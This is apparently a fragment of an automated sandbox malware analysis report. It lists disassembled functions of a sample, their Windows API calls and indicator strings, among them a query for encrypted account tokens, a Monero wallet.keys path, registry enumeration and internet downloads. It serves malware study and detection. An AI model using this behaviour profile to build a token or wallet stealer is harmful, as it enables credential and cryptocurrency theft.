                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 17e70823dfb760edb8ec55c0af36657f831eb355128d42987d6e329bc982a6a0
                              • Instruction ID: 850a6aca7fa90327d3f459a32dfe8e692a97db7664ed9dd20a619e5a9f9f23b4
                              • Opcode Fuzzy Hash: 17e70823dfb760edb8ec55c0af36657f831eb355128d42987d6e329bc982a6a0
                              • Instruction Fuzzy Hash: F8B127729101089ADB08EBA8CD96AEE7339FF24300F514129B506F7191EE346A49CFA3
                              Function 00866770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 4a0a052e1bc2f912dcdcbac072fdc5341bd980537908fb53dc733cce4318ca76
                              • Instruction ID: 0578c9d78606f1d3a04dc1e0b4adf39fc5a5d40eb7790923cd4b31680d6cee88
                              • Opcode Fuzzy Hash: 4a0a052e1bc2f912dcdcbac072fdc5341bd980537908fb53dc733cce4318ca76
                              • Instruction Fuzzy Hash: DBF05E31A04269EFD344DFE0E90A72C7B70FB14703F04029BE609C6290EE704B529BD6
                              Function 00854FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00854FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00854FD1
                              • InternetOpenA.WININET(00870DDF,00000000,00000000,00000000,00000000), ref: 00854FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00855011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00855041
                              • InternetCloseHandle.WININET(?), ref: 008550B9
                              • InternetCloseHandle.WININET(?), ref: 008550C6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 104dcb798baa48a72843b08389535dd4a0fce0e392406e5abfb868537de4801f
                              • Instruction ID: cb52479619bcd057bd024af95b68f1548632a3031098d16c83baf6327cc10771
                              • Opcode Fuzzy Hash: 104dcb798baa48a72843b08389535dd4a0fce0e392406e5abfb868537de4801f
                              • Instruction Fuzzy Hash: 8531FCB4A4021CABDB20CF94DC85BDDB7B4FB48705F5081D9EB09A7281CB706AC58F99
                              Function 008683DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00868426
                              • wsprintfA.USER32 ref: 00868459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0086847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0086848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00868499
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,015CDE38,00000000,000F003F,?,00000400), ref: 008684EC
                              • lstrlen.KERNEL32(?), ref: 00868501
                              • RegQueryValueExA.ADVAPI32(00000000,015CDE50,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00870B34), ref: 00868599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00868608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0086861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: d9d15b16e2e14a25201ca8c49fb0bbd501235f204990413c8ea87b8daf31fd97
                              • Instruction ID: 08fe5059392b81719258e90a558786ec948c15c110c14ec3a88cb4c866264bfa
                              • Opcode Fuzzy Hash: d9d15b16e2e14a25201ca8c49fb0bbd501235f204990413c8ea87b8daf31fd97
                              • Instruction Fuzzy Hash: ED21EB71A1021C9BDB24DB54DC85FE9B3B8FB58700F00C5D9E609A6140DF716A86CFD5
                              Function 00867690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008676A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008676AB
                              • RegOpenKeyExA.ADVAPI32(80000002,015BB968,00000000,00020119,00000000), ref: 008676DD
                              • RegQueryValueExA.ADVAPI32(00000000,015CDF58,00000000,00000000,?,000000FF), ref: 008676FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00867708
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 11197373d0212bf705643c93aa4a219c59498fd9cc6fec67b4da1c1e07971de4
                              • Instruction ID: a5cbab506c03e344a5199a5f9ac19583c7f9bab676ec0985d235f5ff9e9e8731
                              • Opcode Fuzzy Hash: 11197373d0212bf705643c93aa4a219c59498fd9cc6fec67b4da1c1e07971de4
                              • Instruction Fuzzy Hash: D6014FB5B04208BBDB00DBE4DD4AF6AB7B8EB58705F108056FA05D7290EA7099058BD1
                              Function 00867720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0086773B
                              • RegOpenKeyExA.ADVAPI32(80000002,015BB968,00000000,00020119,008676B9), ref: 0086775B
                              • RegQueryValueExA.ADVAPI32(008676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0086777A
                              • RegCloseKey.ADVAPI32(008676B9), ref: 00867784
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 83285946bedec364b692ba4faa6cb3556f523ca541df31dca3a87109f9274ebe
                              • Instruction ID: e60c01d77f730933ad2e6cf9fd26bd1d2da49c7e343b64288fbd0cd8e208275e
                              • Opcode Fuzzy Hash: 83285946bedec364b692ba4faa6cb3556f523ca541df31dca3a87109f9274ebe
                              • Instruction Fuzzy Hash: 7A01F4B9A40308FBD700DBE4DC4AFAEB7B8EB54705F108556FA05E7281DA7455018B91
                              Function 008640B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 008640D5
                              • RegOpenKeyExA.ADVAPI32(80000001,015CD678,00000000,00020119,?), ref: 008640F4
                              • RegQueryValueExA.ADVAPI32(?,015CD8F8,00000000,00000000,00000000,000000FF), ref: 00864118
                              • RegCloseKey.ADVAPI32(?), ref: 00864122
                              • lstrcat.KERNEL32(?,00000000), ref: 00864147
                              • lstrcat.KERNEL32(?,015CD850), ref: 0086415B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 914545d5b09f35b2ff64fd2da055ed02046806ff104a63c068e81f712405e91c
                              • Instruction ID: 4d4c00422efd264611a3ce1d6c9f626591b114b86bbcc8277c51fefc76abfe90
                              • Opcode Fuzzy Hash: 914545d5b09f35b2ff64fd2da055ed02046806ff104a63c068e81f712405e91c
                              • Instruction Fuzzy Hash: B94176B69001086BDF14EBE4DC46FEE737DFB98300F00455AB61696181EE755B898BE3
                              Function 008599C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008599EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00859A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00859A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0085148F,00000000), ref: 00859A5A
                              • LocalFree.KERNEL32(0085148F), ref: 00859A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00859A9A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 26660b000e2e45bb56c15e1cb472edb2119289a1581b5d49aa7d49c4f4e9117c
                              • Instruction ID: 39ad5fbaf73eb24e68720e7d4355636c46905be216c854a9b8d3c6598b7de1e4
                              • Opcode Fuzzy Hash: 26660b000e2e45bb56c15e1cb472edb2119289a1581b5d49aa7d49c4f4e9117c
                              • Instruction Fuzzy Hash: 0E3149B4A00219EFDB15CFA4C885BAE77B5FF48351F108159E902E7290DB78AA45CFA1
                              Function 0086C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: be86092c2a6ded43b8a31b218af8f15c07722e93ea7c2e7105cb4ae3aabe23d7
                              • Instruction ID: 06d063fda1ece5207838047b3e7579b0cfa8fe8b5880bf272d26ea90fbfe4e73
                              • Opcode Fuzzy Hash: be86092c2a6ded43b8a31b218af8f15c07722e93ea7c2e7105cb4ae3aabe23d7
                              • Instruction Fuzzy Hash: 8441E4B150079C5EDB258B28CC84FFBBBE8FB45708F1444A8E9CAC7182D2719A45CF60
                              Function 00864780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,015CD988), ref: 008647DB
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00864801
                              • lstrcat.KERNEL32(?,?), ref: 00864820
                              • lstrcat.KERNEL32(?,?), ref: 00864834
                              • lstrcat.KERNEL32(?,015BB298), ref: 00864847
                              • lstrcat.KERNEL32(?,?), ref: 0086485B
                              • lstrcat.KERNEL32(?,015CD5D8), ref: 0086486F
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 00868D90: GetFileAttributesA.KERNEL32(00000000,?,00851B54,?,?,0087564C,?,?,00870E1F), ref: 00868D9F
                                • Part of subcall function 00864570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00864580
                                • Part of subcall function 00864570: RtlAllocateHeap.NTDLL(00000000), ref: 00864587
                                • Part of subcall function 00864570: wsprintfA.USER32 ref: 008645A6
                                • Part of subcall function 00864570: FindFirstFileA.KERNEL32(?,?), ref: 008645BD
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 452e89f9e74bb9138a06b56242406bea9efde8a4b3775dc9d74c3538a1e522bd
                              • Instruction ID: 0e0394cdea8b7087e67e85a19b393e073f141fb19ca99f16969851b80a22e7d1
                              • Opcode Fuzzy Hash: 452e89f9e74bb9138a06b56242406bea9efde8a4b3775dc9d74c3538a1e522bd
                              • Instruction Fuzzy Hash: 40316EB2A00218A7CF14FBB4DC85EE97378FB58700F44458AB31996081EE7496898B92
                              Function 00862C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00862D85
                              Strings
                              • ')", xrefs: 00862CB3
